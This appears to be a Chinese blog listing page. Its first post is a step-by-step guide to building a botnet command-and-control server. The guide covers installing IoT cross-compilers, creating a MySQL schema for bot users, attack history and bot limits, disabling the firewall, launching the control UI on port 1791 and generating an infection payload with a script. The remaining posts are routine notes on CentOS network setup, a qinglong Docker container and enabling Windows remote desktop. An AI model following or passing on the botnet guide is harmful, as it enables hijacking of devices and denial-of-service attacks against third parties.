loe 发布的文章

==========================================================

            搭建僵尸网络前准备
  1. 最低2核CPU,8G内存,1G口,支持扫表
  2. 安装Linux Linux Centos 6.5 64位
  3. 下载MobaXterm (https://mobaxterm.mobatek.net/download.html)
  4. 下载putty(https://www.chiark.greenend.org.uk/~sgtatham/putty/)
  5. 准备JS压缩包
  6. 准备僵尸列表

==========================================================

  1. 使用MobaXterm,SSH连接服务器

输入下面######中的命令
yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y
ln -s /usr/lib64/libgmp.so.3 /usr/lib64/libgmp.so.10
wget http://repo.mysql.com/mysql-community-release-el7-5.noarch.rpm
rpm -ivh mysql-community-release-el7-5.noarch.rpm
yum install mysql-server -y

mkdir /etc/xcompile
cd /etc/xcompile
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 --no-check-certificate
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2 --no-check-certificate
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2 --no-check-certificate
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
rm -rf *.tar.bz2
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
cd /tmp
wget https://dl.google.com/go/go1.13.5.linux-amd64.tar.gz --no-check-certificate
tar -xvf go1.13.5.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords

【以上是第一步命令】
  1. 修改完成后,将所有文件全选,拖进MobaXterm,你服务器的/root文件夹中

4.输入下面#####中的命令

service mysqld start
mysql_secure_installation #默认密码是空

5.输入下面#####中的命令

mysql -u root -proot
输入密码

6.输入下面#####中的命令

【6.复制以下命令】

use mysql
GRANT ALL ON . to root@'%' IDENTIFIED BY 'root';
FLUSH PRIVILEGES;

CREATE DATABASE Mana;
use Mana;
CREATE TABLE history (
id int(10) unsigned NOT NULL AUTO_INCREMENT,
user_id int(10) unsigned NOT NULL,
time_sent int(10) unsigned NOT NULL,
duration int(10) unsigned NOT NULL,
command text NOT NULL,
max_bots int(11) DEFAULT '-1',
PRIMARY KEY (id),
KEY user_id (user_id)
);

CREATE TABLE users (
id int(10) unsigned NOT NULL AUTO_INCREMENT,
username varchar(32) NOT NULL,
password varchar(32) NOT NULL,
duration_limit int(10) unsigned DEFAULT NULL,
cooldown int(10) unsigned NOT NULL,
wrc int(10) unsigned DEFAULT NULL,
last_paid int(10) unsigned NOT NULL,
max_bots int(11) DEFAULT '-1',
admin int(10) unsigned DEFAULT '0',
intvl int(10) unsigned DEFAULT '30',
api_key text,
PRIMARY KEY (id),
KEY username (username)
);

CREATE TABLE whitelist (
id int(10) unsigned NOT NULL AUTO_INCREMENT,
prefix varchar(16) DEFAULT NULL,
netmask tinyint(3) unsigned DEFAULT NULL,
PRIMARY KEY (id),
KEY prefix (prefix)
);
INSERT INTO users VALUES (NULL, 'root', 'root', 0, 0, 0, 0, -1, 1, 30, '');

CREATE TABLE logins (
id int(11) NOT NULL,
username varchar(32) NOT NULL,
action varchar(32) NOT NULL,
ip varchar(15) NOT NULL,
timestamp timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
exit;

【以上是第六步命令】

  1. 输入下面#####中的命令

    service iptables stop
    service httpd restart
    service mysqld restart

  2. 输入下面#####中的命令

    cd ~/
    chmod 0777 * -R
    sh build.sh

  3. 输入下面#####中的命令

    nano /usr/include/bits/typesizes.h

    下滑鼠标找到 “1024” 改写成 “999999”
    按CTRL+X,再按Y保存,再按回车键返回命令

  4. 输入下面#####中的命令

    screen ./ui

    输入后,会黑屏,出现高亮显示字体,按CTRL+A +D
    显示[detached]
    说明设置成功

  1. 运行putty,输入IP+端口1791 ,选择Raw, 打开
    输入long 回车
    输入登录账号和密码

python ManaPayload.py

复制Payload: 后面所有指令粘贴到你新的服务器上

有关于centos7获取IP地址的方法主要有两种,1:动态获取ip;2:设置静态IP地址

在配置网络之前我们先要知道centos的网卡名称是什么,centos7不再使用ifconfig命令,可通过命令 IP addr查看,如图,网卡名为ens32,是没有IP地址的

1653385999937.png

1、动态获取ip(前提是你的路由器已经开启了DHCP)

修改网卡配置文件 vi /etc/sysconfig/network-scripts/ifcfg-ens32 (最后一个为网卡名称)

动态获取IP地址需要修改两处地方即可

(1)bootproto=dhcp

(2)onboot=yes

1653386031646.jpeg

nmcli c reload -重启网卡

nmcli d connect bond0//网卡名 -立即生效,刷新网卡活跃

修改后重启一下网络服务即可。

这样动态配置IP地址就设置好了,这个时候再查看一下ip addr 就可以看到已经获取了IP地址,且可以上网(ping 百度)

1653386144978.png

2、配置静态IP地址

设置静态IP地址与动态iIP差不多,也是要修改网卡配置文件 vi /etc/sysconfig/network-scripts/ifcfg-ens32 (最后一个为网卡名称)

(1)bootproto=static

(2)onboot=yes

(3)在最后加上几行,IP地址、子网掩码、网关、dns服务器

IPADDR=192.168.1.160
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
DNS1=223.5.5.5
DNS2=223.6.6.6

(4)重启网络服务

nmcli c reload -重启网卡

nmcli d connect bond0//网卡名 -立即生效,刷新网卡活跃

DNS服务器可以只配一个,我用的是两个免费的dns服务器,查看IP地址,测试联网

1653386280578.jpeg

1.先去宝塔安装docker

2.然后登陆ssh拉取qinglong镜像

docker pull whyour/qinglong:latest

3.启动容器

普通服务器

docker run -dit \
-v $PWD/ql/config:/ql/config \
-v $PWD/ql/log:/ql/log \
-v $PWD/ql/db:/ql/db \
-p 5700:5700 \
--name qinglong \
--hostname qinglong \
--restart always \
whyour/qinglong:latest


n1路由器等

docker run -dit \
-v $PWD/ql/config:/ql/config \
-v $PWD/ql/log:/ql/log \
-v $PWD/ql/db:/ql/db \
--net host \
--name qinglong \
--hostname qinglong \
--restart always \
whyour/qinglong:latest

在开启防火墙中、接入规则中的“TCP-in”,将其启用,如下图所示

e8402fc6c2c44f72ac09d0e527b42e72.png

12.png

最后设置组策略,找到计算机配置----->管理模板----->网络----->网络连接----->Windows防火墙----->标准配置文件----->Windows防火墙允许入站远程桌面例外,将其启用。

13.png

d06d0d10175042459ce743cf0abbcefa.png

  1. 1
  2. ...
  3. 5
  4. 6
  5. 7
  6. 8
  7. 9
  8. 10